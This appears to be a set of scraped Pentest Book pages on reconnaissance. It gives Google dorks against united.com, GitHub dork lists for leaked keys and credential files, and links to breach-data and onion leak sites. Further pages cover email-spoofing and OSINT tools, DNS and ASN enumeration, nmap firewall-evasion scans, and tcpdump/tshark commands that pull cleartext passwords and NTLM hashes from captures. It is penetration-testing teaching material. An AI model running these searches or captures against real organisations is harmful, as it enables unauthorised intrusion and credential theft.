https://www.google.com/search?q=site%3Aunited.com%20ext%3Abkf%20%7C%20ext%3Abkp%20%7C%20ext%3Abak%20%7C%20ext%3Aold%20%7C%20ext%3Abackup # Login pages https://www.google.com/search?q=site%3Aunited.com%20inurl%3Asignup%20%7C%20inurl%3Aregister%20%7C%20intitle%3ASignup # Config files https://www.google.com/search?q=site%3Aunited.com%20ext%3Axml%20%7C%20ext%3Aconf%20%7C%20ext%3Acnf%20%7C%20ext%3Areg%20%7C%20ext%3Ainf%20%7C%20ext%3Ardp%20%7C%20ext%3Acfg%20%7C%20ext%3Atxt%20%7C%20ext%3Aora%20%7C%20ext%3Aenv%20%7C%20ext%3Aini # .git folder https://www.google.com/search?q=inurl%3A%5C%22%2F.git%5C%22%20united.com%20-github # Database files https://www.google.com/search?q=site%3Aunited.com%20ext%3Asql%20%7C%20ext%3Adbf%20%7C%20ext%3Amdb # Open redirects https://www.google.com/search?q=site%3Aunited.com%20inurl%3Aredir%20%7C%20inurl%3Aurl%20%7C%20inurl%3Aredirect%20%7C%20inurl%3Areturn%20%7C%20inurl%3Asrc%3Dhttp%20%7C%20inurl%3Ar%3Dhttp # Code share sites https://www.google.com/search?q=site%3Asharecode.io%20%7C%20site%3Acontrolc.com%20%7C%20site%3Acodepad.co%20%7Csite%3Aideone.com%20%7C%20site%3Acodebeautify.org%20%7C%20site%3Ajsdelivr.com%20%7C%20site%3Acodeshare.io%20%7C%20site%3Acodepen.io%20%7C%20site%3Arepl.it%20%7C%20site%3Ajsfiddle.net%20%22united%22 # Pastebin-like sites https://www.google.com/search?q=site%3Ajustpaste.it%20%7C%20site%3Aheypasteit.com%20%7C%20site%3Apastebin.com%20%22united%22 # Linkedin employees https://www.google.com/search?q=site%3Alinkedin.com%20employees%20united.com # Project management sites https://www.google.com/search?q=site%3Atrello.com%20%7C%20site%3A*.atlassian.net%20%22united%22 # Other files https://www.google.com/search?q=site%3Aunited.com%20intitle%3Aindex.of%20%7C%20ext%3Alog%20%7C%20ext%3Aphp%20intitle%3Aphpinfo%20%5C%22published%20by%20the%20PHP%20Group%5C%22%20%7C%20inurl%3Ashell%20%7C%20inurl%3Abackdoor%20%7C%20inurl%3Awso%20%7C%20inurl%3Acmd%20%7C%20shadow%20%7C%20passwd%20%7C%20boot.ini%20%7C%20inurl%3Abackdoor%20%7C%20inurl%3Areadme%20%7C%20inurl%3Alicense%20%7C%20inurl%3Ainstall%20%7C%20inurl%3Asetup%20%7C%20inurl%3Aconfig%20%7C%20inurl%3A%5C%22%2Fphpinfo.php%5C%22%20%7C%20inurl%3A%5C%22.htaccess%5C%22%20%7C%20ext%3Aswf # Sub-subdomains https://www.google.com/search?q=site%3A*.*.united.com # Jenkins https://www.google.com/search?q=intitle%3A%5C%22Dashboard%20%5BJenkins%5D%5C%22%20%22united%22 # Traefik https://www.google.com/search?q=intitle%3Atraefik%20inurl%3A8080%2Fdashboard%20%22united%22 # Cloud buckets S3/GCP https://www.google.com/search?q=site%3A.s3.amazonaws.com%20%7C%20site%3Astorage.googleapis.com%20%7C%20site%3Aamazonaws.com%20%22united%22 # SQL errors https://www.google.com/search?q=site%3Aunited.com%20intext%3A%5C%22sql%20syntax%20near%5C%22%20%7C%20intext%3A%5C%22syntax%20error%20has%20occurred%5C%22%20%7C%20intext%3A%5C%22incorrect%20syntax%20near%5C%22%20%7C%20intext%3A%5C%22unexpected%20end%20of%20SQL%20command%5C%22%20%7C%20intext%3A%5C%22Warning%3A%20mysql_connect()%5C%22%20%7C%20intext%3A%5C%22Warning%3A%20mysql_query()%5C%22%20%7C%20intext%3A%5C%22Warning%3A%20pg_connect()%5C%22 # Exposed documents https://www.google.com/search?q=site%3Aunited.com%20ext%3Adoc%20%7C%20ext%3Adocx%20%7C%20ext%3Aodt%20%7C%20ext%3Apdf%20%7C%20ext%3Artf%20%7C%20ext%3Asxw%20%7C%20ext%3Apsw%20%7C%20ext%3Appt%20%7C%20ext%3Apptx%20%7C%20ext%3Apps%20%7C%20ext%3Acsv # Wordpress files https://www.google.com/search?q=site%3Aunited.com%20inurl%3Awp-content%20%7C%20inurl%3Awp-includes # Apache Struts RCE https://www.google.com/search?q=site%3Aunited.com%20ext%3Aaction%20%7C%20ext%3Astruts%20%7C%20ext%3Ado # GitLab/GitHub/Bitbucket https://www.google.com/search?q=site%3Agithub.com%20%7C%20site%3Agitlab.com%20%7C%20site%3Abitbucket.org%20%22united%22 # Subdomains https://www.google.com/search?q=site%3A*.united.com # Stackoverflow https://www.google.com/search?q=site%3Astackoverflow.com%20%22united.com%22 # PHP errors https://www.google.com/search?q=site%3Aunited.com%20%5C%22PHP%20Parse%20error%5C%22%20%7C%20%5C%22PHP%20Warning%5C%22%20%7C%20%5C%22PHP%20Error%5C%22 Copy #https://github.com/obheda12/GitDorker python3 GitDorker.py -tf ~/Tools/.github_tokens -q united.com -p -ri -d Dorks/medium_dorks.txt Copy ".mlab.com password" "access_key" "access_token" "amazonaws" "api.googlemaps AIza" "api_key" "api_secret" "apidocs" "apikey" "apiSecret" "app_key" "app_secret" "appkey" "appkeysecret" "application_key" "appsecret" "appspot" "auth" "auth_token" "authorizationToken" "aws_access" "aws_access_key_id" "aws_key" "aws_secret" "aws_token" "AWSSecretKey" "bashrc password" "bucket_password" "client_secret" "cloudfront" "codecov_token" "config" "conn.login" "connectionstring" "consumer_key" "credentials" "database_password" "db_password" "db_username" "dbpasswd" "dbpassword" "dbuser" "dot-files" "dotfiles" "encryption_key" "fabricApiSecret" "fb_secret" "firebase" "ftp" "gh_token" "github_key" "github_token" "gitlab" "gmail_password" "gmail_username" "herokuapp" "internal" "irc_pass" "JEKYLL_GITHUB_TOKEN" "key" "keyPassword" "ldap_password" "ldap_username" "login" "mailchimp" "mailgun" "master_key" "mydotfiles" "mysql" "node_env" "npmrc _auth" "oauth_token" "pass" "passwd" "password" "passwords" "pem private" "preprod" "private_key" "prod" "pwd" "pwds" "rds.amazonaws.com password" "redis_password" "root_password" "secret" "secret.password" "secret_access_key" "secret_key" "secret_token" "secrets" "secure" "security_credentials" "send.keys" "send_keys" "sendkeys" "SF_USERNAME salesforce" "sf_username" "site.com" FIREBASE_API_JSON= "site.com" vim_settings.xml "slack_api" "slack_token" "sql_password" "ssh" "ssh2_auth_password" "sshpass" "staging" "stg" "storePassword" "stripe" "swagger" "testuser" "token" "x-api-key" "xoxb " "xoxp" Jenkins OTP oauth authoriztion password pwd ftp dotfiles JDBC key-keys send_key-keys send,key-keys token user login-singin passkey-passkeys pass secret SecretAccessKey app_AWS_SECRET_ACCESS_KEY AWS_SECRET_ACCESS_KEY credentials config security_credentials connectionstring ssh2_auth_password DB_PASSWORD [WFClient] Password= extension:ica access_key bucket_password dbpassword dbuser extension:avastlic "support.avast.com" extension:bat extension:cfg extension:env extension:exs extension:ini extension:json api.forecast.io extension:json googleusercontent client_secret extension:json mongolab.com extension:pem extension:pem private extension:ppk extension:ppk private extension:properties extension:sh extension:sls extension:sql extension:sql mysql dump extension:sql mysql dump password extension:yaml mongolab.com extension:zsh filename:.bash_history filename:.bash_history DOMAIN-NAME filename:.bash_profile aws filename:.bashrc mailchimp filename:.bashrc password filename:.cshrc filename:.dockercfg auth filename:.env DB_USERNAME NOT homestead filename:.env MAIL_HOST=smtp.gmail.com filename:.esmtprc password filename:.ftpconfig filename:.git-credentials filename:.history filename:.htpasswd filename:.netrc password filename:.npmrc _auth filename:.pgpass filename:.remote-sync.json filename:.s3cfg filename:.sh_history filename:.tugboat NOT _tugboat filename:_netrc password filename:apikey filename:bash filename:bash_history filename:bash_profile filename:bashrc filename:beanstalkd.yml filename:CCCam.cfg filename:composer.json filename:config filename:config irc_pass filename:config.json auths filename:config.php dbpasswd filename:configuration.php JConfig password filename:connections filename:connections.xml filename:constants filename:credentials filename:credentials aws_access_key_id filename:cshrc filename:database filename:dbeaver-data-sources.xml filename:deployment-config.json filename:dhcpd.conf filename:dockercfg filename:environment filename:express.conf filename:express.conf path:.openshift filename:filezilla.xml filename:filezilla.xml Pass filename:git-credentials filename:gitconfig filename:global filename:history filename:htpasswd filename:hub oauth_token filename:id_dsa filename:id_rsa filename:id_rsa or filename:id_dsa filename:idea14.key filename:known_hosts filename:logins.json filename:makefile filename:master.key path:config filename:netrc filename:npmrc filename:pass filename:passwd path:etc filename:pgpass filename:prod.exs filename:prod.exs NOT prod.secret.exs filename:prod.secret.exs filename:proftpdpasswd filename:recentservers.xml filename:recentservers.xml Pass filename:robomongo.json filename:s3cfg filename:secrets.yml password filename:server.cfg filename:server.cfg rcon password filename:settings filename:settings.py SECRET_KEY filename:sftp-config.json filename:sftp-config.json password filename:sftp.json path:.vscode filename:shadow filename:shadow path:etc filename:spec filename:sshd_config filename:token filename:tugboat filename:ventrilo_srv.ini filename:WebServers.xml filename:wp-config filename:wp-config.php filename:zhrc HEROKU_API_KEY language:json HEROKU_API_KEY language:shell HOMEBREW_GITHUB_API_TOKEN language:shell jsforce extension:js conn.login language:yaml -filename:travis msg nickserv identify filename:config org:Target "AWS_ACCESS_KEY_ID" org:Target "list_aws_accounts" org:Target "aws_access_key" org:Target "aws_secret_key" org:Target "bucket_name" org:Target "S3_ACCESS_KEY_ID" org:Target "S3_BUCKET" org:Target "S3_ENDPOINT" org:Target "S3_SECRET_ACCESS_KEY" password path:sites databases password private -language:java PT_TOKEN language:bash redis_password root_password secret_access_key SECRET_KEY_BASE= shodan_api_key language:python WORDPRESS_DB_PASSWORD= xoxp OR xoxb OR xoxa s3.yml .exs beanstalkd.yml deploy.rake .sls — — — — — — — — — — — — — — — — — — -BASH — — — — — — — — — — language:bash password language:bash pwd language:bash ftp language:bash dotfiles language:bash JDBC language:bash key-keys language:bash send_key-keys language:bash send,key-keys language:bash token language:bash user language:bash login-singin language:bash passkey-passkeys language:bash pass language:bash secret language:bash credentials language:bash config language:bash security_credentials language:bash connectionstring language:bash ssh2_auth_password — — — — — — — — — — — — — — — — — — -PYTHON — — — — — — — — — language:python password language:python pwd language:python ftp language:python dotfiles language:python JDBC language:python key-keys language:python send_key-keys language:python send,key-keys language:python token language:python user language:python login-singin language:python passkey-passkeys language:python pass language:python secret language:python credentials language:python config language:python security_credentials language:python connectionstring language:python ssh2_auth_password org:facebookresearch https:// org:facebookresearch http:// org:facebookresearch ldap org:facebookresearch ftp org:facebookresearch sftp org:facebookresearch host: org:facebookresearch login Copy port:"9200" elastic product:"docker" product:"kubernetes" hostname:"target.com" host:"10.10.10.10" # Spring boot servers, look for /env or /heapdump org:YOUR_TAGET http.favicon.hash:116323821 Copy # Company string name to CIDR # https://github.com/dhn/spk spk -json -s "Google" # Versatile tool with multiple input options and output formats # https://github.com/projectdiscovery/asnmap asnmap -i 1.3.3.7 -org GOOGLE -d facebook.com,twitter.com -a AS394161 # https://github.com/nitefood/asn asn -n 8.8.8.8 # https://github.com/j3ssie/metabigor echo "company" | metabigor net --org echo "ASN1111" | metabigor net --asn # https://github.com/yassineaboukir/Asnlookup python asnlookup.py -m -o # https://github.com/harleo/asnip asnip -t domain.com -p # https://github.com/projectdiscovery/mapcidr echo 10.10.10.0/24 | mapcidr # https://github.com/eslam3kl/3klector python 3klector.py -t company # https://github.com/SpiderLabs/HostHunter python3 hosthunter.py targets.txt # Website (with API) https://asnlookup.com/ Copy # pwndb # https://github.com/davidtavarez/pwndb python3 pwndb.py --target asd@asd.com # Websites https://link-base.org/index.php http://xjypo5vzgmo7jca6b322dnqbsdnp3amd24ybx26x5nxbusccjkm4pwid.onion/ http://pwndb2am4tzkvold.onion https://weleakinfo.to/ https://www.dehashed.com/search?query= https://haveibeenpwned.com https://breachchecker.com https://vigilante.pw/ https://leak.sx/ https://intelx.io https://search.illicit.services/ https://breachdirectory.org/ breachdirectory.org + (hashes.com || md5decrypt.net || crackstation.net)# Nice combination # Check hashes with this tool https://github.com/jackrendor/jhf Copy # https://github.com/SimplySecurity/SimplyEmail ./SimplyEmail.py pip3 install mailspoof sudo mailspoof -d domain.com # Test email spoof https://emkei.cz/ # Find emails in an org https://hunter.io https://snov.io/email-finder https://app.snov.io/domain-search https://hunter.io/ # https://github.com/sham00n/buster buster -e target@example.com # https://github.com/m4ll0k/Infoga python infoga.py # https://github.com/martinvigo/email2phonenumber python email2phonenumber.py scrape -e target@email.com # https://github.com/jkakavas/creepy/ # https://github.com/Josue87/EmailFinder emailfinder -d domain.com # https://github.com/laramies/theHarvester python3 theHarvester.py -d domain.com -b "linkedin" Copy # https://github.com/obheda12/GitDorker python3 GitDorker.py -tf TOKENSFILE -q tesla.com -d dorks/DORKFILE -o target # https://github.com/dxa4481/truffleHog trufflehog https://github.com/Plazmaz/leaky-repo trufflehog --regex --entropy=False https://github.com/Plazmaz/leaky-repo # https://github.com/eth0izzle/shhgit shhgit --search-query AWS_ACCESS_KEY_ID=AKIA # https://github.com/d1vious/git-wild-hunt python git-wild-hunt.py -s "extension:json filename:creds language:JSON" # https://shhgit.darkport.co.uk/ # GitLab (API token required) # https://github.com/codeEmitter/token-hunter ./token-hunter.py -g 123456 Copy # https://github.com/Josue87/MetaFinder metafinder -d "domain.com" -l 10 -go -bi -ba -o united Copy # General https://analystresearchtools.com/ # Twitter # https://github.com/twintproject/twint twint -u username # Google account # https://github.com/mxrch/ghunt python hunt.py myemail@gmail.com # Instagram # https://github.com/th3unkn0n/osi.ig python3 main.py -u username # Public GDrive docs https://www.dedigger.com/#gsc.tab=0 # Websites emailrep.io # Accounts registered by email tinfoleak.com # Twitter mostwantedhf.info # Skype searchmy.bio # Instagram search.carrot2.org # Results grouped by topic boardreader.com # forums searchcode.com # search by code in repositories swisscows.com # semantic search engine publicwww.com # search by source page code psbdmp.ws # search in pastebin kribrum.io # social-media search engine whatsmyname.app --- # Subdomain Takeover | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/recon/subdomain-enum/subdomain-takeover.md) . [](https://www.pentest-book.com/recon/subdomain-enum/subdomain-takeover#explanation) Explanation ----------------------------------------------------------------------------------------------------- 1. Domain name (sub.example.com) uses a CNAME record for another domain (sub.example.com CNAME anotherdomain.com). 2. At some point, anotherdomain.com expires and is available for anyone's registration. 3. Since the CNAME record is not removed from the DNS zone of example.com, anyone who records anotherdomain.com has full control over sub.example.com until the DNS record is present. [](https://www.pentest-book.com/recon/subdomain-enum/subdomain-takeover#resources) Resources ------------------------------------------------------------------------------------------------- [![Logo](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2F0xpatrik.com%2Ffavicon.png&width=20&dpr=3&quality=100&sign=2aa977ff&sv=2)Subdomain Takeover: Proof Creation for Bug BountiesPatrik Hudak](https://0xpatrik.com/takeover-proofs/) [![Logo](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=3&quality=100&sign=21fe07f0&sv=2)GitHub - EdOverflow/can-i-take-over-xyz: "Can I take over XYZ?" — a list of services and how to claim (sub)domains with dangling DNS records.GitHub](https://github.com/EdOverflow/can-i-take-over-xyz) [PreviousSubdomain Enum](https://www.pentest-book.com/recon/subdomain-enum) [NextWebs recon](https://www.pentest-book.com/recon/webs-recon) Last updated 4 years ago Was this helpful? * [Explanation](https://www.pentest-book.com/recon/subdomain-enum/subdomain-takeover#explanation) * [Resources](https://www.pentest-book.com/recon/subdomain-enum/subdomain-takeover#resources) Was this helpful? --- # Root domains | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/recon/domain-enum.md) . ### [](https://www.pentest-book.com/recon/domain-enum#basic) Basic Copy # https://github.com/OWASP/Amass amass intel -d domain.com -whois # Search on Google https://google.com/search?q=united+airlines # Analyze owners on domainbigdata https://iqwhois.com/ ### [](https://www.pentest-book.com/recon/domain-enum#reverse-whois) Reverse whois Copy https://viewdns.info/reversewhois/?q=United+Airlines https://tools.whoisxmlapi.com/reverse-whois-search ### [](https://www.pentest-book.com/recon/domain-enum#asn) ASN Copy https://bgp.he.net/search?search%5Bsearch%5D=united+airlines&commit=Search whois -h whois.radb.net -- '-i origin AS11535' | grep -Eo "([0-9.]+){4}/[0-9]+" | uniq whois -h whois.radb.net -- '-i origin AS20461' | grep -Eo "([0-9.]+){4}/[0-9]+" | uniq | mapcidr -silent | dnsx -ptr -resp-only -retry 3 -silent ### [](https://www.pentest-book.com/recon/domain-enum#favicon) Favicon ### [](https://www.pentest-book.com/recon/domain-enum#google-analytics-id) Google Analytics ID ### [](https://www.pentest-book.com/recon/domain-enum#dns-manual-recon) DNS manual recon ### [](https://www.pentest-book.com/recon/domain-enum#reverse-ip-search) Reverse IP search ### [](https://www.pentest-book.com/recon/domain-enum#tld-bruteforcing) TLD bruteforcing [PreviousPublic info gathering](https://www.pentest-book.com/recon/public-info-gathering) [NextSubdomain Enum](https://www.pentest-book.com/recon/subdomain-enum) Last updated 5 months ago Was this helpful? * [Basic](https://www.pentest-book.com/recon/domain-enum#basic) * [Reverse whois](https://www.pentest-book.com/recon/domain-enum#reverse-whois) * [ASN](https://www.pentest-book.com/recon/domain-enum#asn) * [Favicon](https://www.pentest-book.com/recon/domain-enum#favicon) * [Google Analytics ID](https://www.pentest-book.com/recon/domain-enum#google-analytics-id) * [DNS manual recon](https://www.pentest-book.com/recon/domain-enum#dns-manual-recon) * [Reverse IP search](https://www.pentest-book.com/recon/domain-enum#reverse-ip-search) * [TLD bruteforcing](https://www.pentest-book.com/recon/domain-enum#tld-bruteforcing) Was this helpful? Copy # https://github.com/pielco11/fav-up python3 favUp.py -ff ~/favicon.ico --shodan-cli # https://github.com/devanshbatham/FavFreak cat urls.txt | python3 favfreak.py # https://faviconhasher.herokuapp.com/ # https://www.shodan.io/search?query=http.favicon.hash%3A-382492124 # https://github.com/edoardottt/favirecon favirecon -u https://target.com/ -v Copy https://builtwith.com/relationships/united.com https://builtwith.com/relationships/tag/UA-29214177 https://api.hackertarget.com/analyticslookup/?q=united.com https://api.hackertarget.com/analyticslookup/?q=UA-16316580 Copy dnsrecon -d www.example.com -a dnsrecon -d www.example.com -t axfr dnsrecon -d www.example.com -g dnsrecon -d www.example.com -D /usr/share/wordlists/subdomains.txt -t brt dig www.example.com + short dig www.example.com MX dig www.example.com NS dig www.example.com> SOA dig www.example.com ANY +noall +answer dig -x www.example.com dig -4 www.example.com (For IPv4) dig -6 www.example.com (For IPv6) dig www.example.com mx +noall +answer example.com ns +noall +answer dig -t AXFR www.example.com dig axfr @10.11.1.111 example.box dnsenum 10.11.1.111 Copy # Get domain from IP # https://reverse-ip.whoisxmlapi.com/ # https://github.com/projectdiscovery/dnsx cat ips.txt | dnsx -ptr -resp-only -silent -retry 3 Copy # TLD bruteforcing tool https://github.com/Sybil-Scan/TLDbrute --- # Network Scanning | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/recon/network-scanning.md) . > **Skill Level**: Beginner to Intermediate **Prerequisites**: Basic networking, TCP/IP [](https://www.pentest-book.com/recon/network-scanning#ip-resolution) IP resolution ---------------------------------------------------------------------------------------- Copy # https://github.com/Josue87/resolveDomains resolveDomains -d subdomains.txt # Expected output: # subdomain1.target.com -> 192.168.1.10 # subdomain2.target.com -> 192.168.1.11 [](https://www.pentest-book.com/recon/network-scanning#netdiscover) Netdiscover ------------------------------------------------------------------------------------ Copy netdiscover -i eth0 netdiscover -r 10.11.1.1/24 # Expected output: # _____________________________________________________________________________ # IP At MAC Address Count Len MAC Vendor / Hostname # ----------------------------------------------------------------------------- # 10.11.1.1 00:50:56:aa:bb:cc 1 60 VMware, Inc. # 10.11.1.5 00:0c:29:dd:ee:ff 1 60 VMware, Inc. [](https://www.pentest-book.com/recon/network-scanning#nmap) Nmap ---------------------------------------------------------------------- [](https://www.pentest-book.com/recon/network-scanning#netbios) NetBios ---------------------------------------------------------------------------- [](https://www.pentest-book.com/recon/network-scanning#ping-sweep-bash) Ping Sweep - Bash ---------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/recon/network-scanning#ping-sweep-windows) Ping Sweep - Windows ---------------------------------------------------------------------------------------------------- [PreviousWebs recon](https://www.pentest-book.com/recon/webs-recon) [NextHost Scanning](https://www.pentest-book.com/recon/host-scanning) Last updated 5 months ago Was this helpful? * [IP resolution](https://www.pentest-book.com/recon/network-scanning#ip-resolution) * [Netdiscover](https://www.pentest-book.com/recon/network-scanning#netdiscover) * [Nmap](https://www.pentest-book.com/recon/network-scanning#nmap) * [NetBios](https://www.pentest-book.com/recon/network-scanning#netbios) * [Ping Sweep - Bash](https://www.pentest-book.com/recon/network-scanning#ping-sweep-bash) * [Ping Sweep - Windows](https://www.pentest-book.com/recon/network-scanning#ping-sweep-windows) Was this helpful? Copy # Host discovery (ping sweep) nmap -sn 10.11.1.1/24 nmap -sn 10.11.1.1-253 nmap -sn 10.11.1.* # Expected output: # Nmap scan report for 10.11.1.5 # Host is up (0.00052s latency). # Nmap scan report for 10.11.1.10 # Host is up (0.00031s latency). # Nmap done: 256 IP addresses (15 hosts up) scanned in 2.43 seconds Copy nbtscan -r 10.11.1.1/24 # Expected output: # IP address NetBIOS Name Server User MAC address # ------------------------------------------------------------------------------ # 10.11.1.5 WORKSTATION1 00:0c:29:aa:bb:cc # 10.11.1.10 DC01 00:0c:29:dd:ee:ff Copy for i in {1..254} ;do (ping -c 1 172.21.10.$i | grep "bytes from" &) ;done # Expected output: # 64 bytes from 172.21.10.1: icmp_seq=1 ttl=64 time=0.5 ms # 64 bytes from 172.21.10.5: icmp_seq=1 ttl=64 time=1.2 ms Copy for /L %i in (1,1,255) do @ping -n 1 -w 200 172.21.10.%i > nul && echo 192.168.1.%i is up. # Expected output: # 192.168.1.1 is up. # 192.168.1.5 is up. --- # Packet Scanning | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/recon/packet-scanning.md) . [](https://www.pentest-book.com/recon/packet-scanning#tcpdump) tcpdump --------------------------------------------------------------------------- Copy # Basic capture tcpdump -i eth0 tcpdump -c 100 -i eth0 # Capture 100 packets tcpdump -A -i eth0 # Print packets in ASCII tcpdump -XX -i eth0 # Print packets in HEX and ASCII tcpdump -w capture.pcap -i eth0 # Write to file tcpdump -r capture.pcap # Read from file tcpdump -n -i eth0 # Don't resolve hostnames tcpdump -nn -i eth0 # Don't resolve hostnames or ports # Filter by port/host tcpdump -i eth0 port 22 tcpdump -i eth0 port 80 or port 443 tcpdump -i eth0 src 172.21.10.X tcpdump -i eth0 dst 172.21.10.X tcpdump -i eth0 host 10.10.10.10 tcpdump -i eth0 net 192.168.1.0/24 # Filter by protocol tcpdump -i eth0 icmp tcpdump -i eth0 tcp tcpdump -i eth0 udp # Complex filters tcpdump -i eth0 'tcp[tcpflags] & (tcp-syn) != 0' # SYN packets tcpdump -i eth0 'tcp[tcpflags] & (tcp-rst) != 0' # RST packets tcpdump -i eth0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' # HTTP with data # Capture credentials (unencrypted) tcpdump -i eth0 -A port 21 or port 23 or port 110 or port 143 # Online service https://packettotal.com/ [](https://www.pentest-book.com/recon/packet-scanning#wireshark-tshark) Wireshark / tshark ----------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/recon/packet-scanning#protocol-specific-analysis) Protocol-specific analysis ----------------------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/recon/packet-scanning#credential-extraction) Credential extraction ------------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/recon/packet-scanning#encrypted-traffic-analysis) Encrypted traffic analysis ----------------------------------------------------------------------------------------------------------------- [](https://www.pentest-book.com/recon/packet-scanning#network-forensics) Network forensics ----------------------------------------------------------------------------------------------- [PreviousHost Scanning](https://www.pentest-book.com/recon/host-scanning) [NextFiles](https://www.pentest-book.com/enumeration/files) Last updated 5 months ago Was this helpful? * [tcpdump](https://www.pentest-book.com/recon/packet-scanning#tcpdump) * [Wireshark / tshark](https://www.pentest-book.com/recon/packet-scanning#wireshark-tshark) * [Protocol-specific analysis](https://www.pentest-book.com/recon/packet-scanning#protocol-specific-analysis) * [Credential extraction](https://www.pentest-book.com/recon/packet-scanning#credential-extraction) * [Encrypted traffic analysis](https://www.pentest-book.com/recon/packet-scanning#encrypted-traffic-analysis) * [Network forensics](https://www.pentest-book.com/recon/packet-scanning#network-forensics) Was this helpful? Copy # CLI capture with tshark tshark -i eth0 # Basic capture tshark -i eth0 -w capture.pcap # Write to file tshark -r capture.pcap # Read from file tshark -i eth0 -f "port 80" # Capture filter tshark -r capture.pcap -Y "http" # Display filter # Extract specific fields tshark -r capture.pcap -T fields -e ip.src -e ip.dst -e tcp.port tshark -r capture.pcap -Y "http.request" -T fields -e http.host -e http.request.uri # Follow TCP streams tshark -r capture.pcap -z follow,tcp,ascii,0 # Protocol statistics tshark -r capture.pcap -z io,phs # Protocol hierarchy tshark -r capture.pcap -z conv,tcp # TCP conversations tshark -r capture.pcap -z endpoints,ip # IP endpoints # Extract HTTP objects tshark -r capture.pcap --export-objects "http,./extracted_files" # Common display filters for Wireshark # http.request.method == "POST" # tcp.flags.syn == 1 # dns.qry.name contains "domain" # ftp.request.command == "PASS" # smb2.filename # kerberos.CNameString Copy # HTTP traffic analysis tshark -r capture.pcap -Y "http" -T fields -e http.host -e http.request.uri -e http.request.method tshark -r capture.pcap -Y "http.request.method==POST" -T fields -e http.file_data # DNS queries tshark -r capture.pcap -Y "dns.flags.response == 0" -T fields -e dns.qry.name # SMB file operations tshark -r capture.pcap -Y "smb2.filename" -T fields -e smb2.filename # FTP credentials tshark -r capture.pcap -Y "ftp.request.command == USER || ftp.request.command == PASS" -T fields -e ftp.request.arg # NTLM hashes (for cracking) tshark -r capture.pcap -Y "ntlmssp.messagetype == 3" -T fields -e ntlmssp.auth.username -e ntlmssp.auth.domain Copy # https://github.com/lgandx/PCredz ./Pcredz -f file-to-parse.pcap ./Pcredz -d /tmp/pcap-directory-to-parse/ ./Pcredz -i eth0 -v # https://github.com/DanMcInerney/net-creds python2 net-creds.py -p capture.pcap python2 net-creds.py -i eth0 # Extract NTLM hashes with NTLMRawUnHide # https://github.com/mlgualtieri/NTLMRawUnHide python3 NTLMRawUnHide.py -i capture.pcap # Wireshark manual extraction # Filter: ntlmssp # Look for NTLMSSP_AUTH messages # Right-click -> Export packet bytes Copy # Decrypt TLS with pre-master secret (if you have SSLKEYLOGFILE) tshark -r capture.pcap -o "tls.keylog_file:sslkeys.log" -Y "http" # Wireshark: Edit -> Preferences -> Protocols -> TLS -> (Pre)-Master-Secret log filename # Identify encrypted protocols without decryption tshark -r capture.pcap -Y "tls.handshake.type == 1" -T fields -e tls.handshake.extensions_server_name # JA3/JA3S fingerprinting for TLS client identification # https://github.com/salesforce/ja3 tshark -r capture.pcap -Y "tls.handshake.type == 1" -T fields -e tls.handshake.ja3 # Detect potential C2 traffic patterns tshark -r capture.pcap -z io,stat,60,"COUNT(frame)frame" # Check for beaconing intervals Copy # Extract all files from pcap # https://github.com/xplico/xplico # https://www.netresec.com/?page=NetworkMiner # Reconstruct sessions tcpflow -r capture.pcap -o output_dir # Find cleartext passwords strings capture.pcap | grep -i "pass\|pwd\|login\|user" # Carve files from network traffic foremost -i capture.pcap -o carved_files binwalk -e capture.pcap --- # Host Scanning | Pentest Book For the complete documentation index, see [llms.txt](https://www.pentest-book.com/llms.txt) . This page is also available as [Markdown](https://www.pentest-book.com/recon/host-scanning.md) . [](https://www.pentest-book.com/recon/host-scanning#nmap) nmap ------------------------------------------------------------------- Copy # Fast simple scan nmap 10.11.1.111 # Nmap ultra fast nmap 10.11.1.111 --max-retries 1 --min-rate 1000 # Get open ports nmap -p - -Pn -n 10.10.10.10 # Comprehensive fast and accurate nmap --top-ports 200 -sV -n --max-retries 2 -Pn --open -iL ips.txt -oA portscan_active # Get sV from ports nmap -pXX,XX,XX,XX,XX -Pn -sV -n 10.10.10.10 # Full complete slow scan with output nmap -v -A -p- -Pn --script vuln -oA full 10.11.1.111 # Network filtering evasion nmap --source-port 53 -p 5555 10.11.1.111 # If work, set IPTABLES to bind this port iptables -t nat -A POSTROUTING -d 10.11.1.111 -p tcp -j SNAT --to :53 # Scan for UDP nmap 10.11.1.111 -sU nmap -sU -F -Pn -v -d -sC -sV --open --reason -T5 10.11.1.111 # FW evasion nmap -f nmap --mtu 24 nmap --data-length 30 nmap --source-port 53 # Nmap better speed flags --max-rtt-timeout: Time response per probe --script-timeout: Time response per script --host-timeout: Time response for host --open: Avoid detection if filtered or closed --min-rate [](https://www.pentest-book.com/recon/host-scanning#shodan) shodan ----------------------------------------------------------------------- ![](https://www.pentest-book.com/~gitbook/image?url=https%3A%2F%2F1729840239-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-M5x1LJiRQvXWpt04_ee%252F-MOf-uaNoxqc-5nQxo3A%252F-MOfAerQBRXDQtFI88g2%252Fimage.png%3Falt%3Dmedia%26token%3D8149e4a0-cd4e-44ba-be50-d5e347892756&width=768&dpr=3&quality=100&sign=fb258435&sv=2) 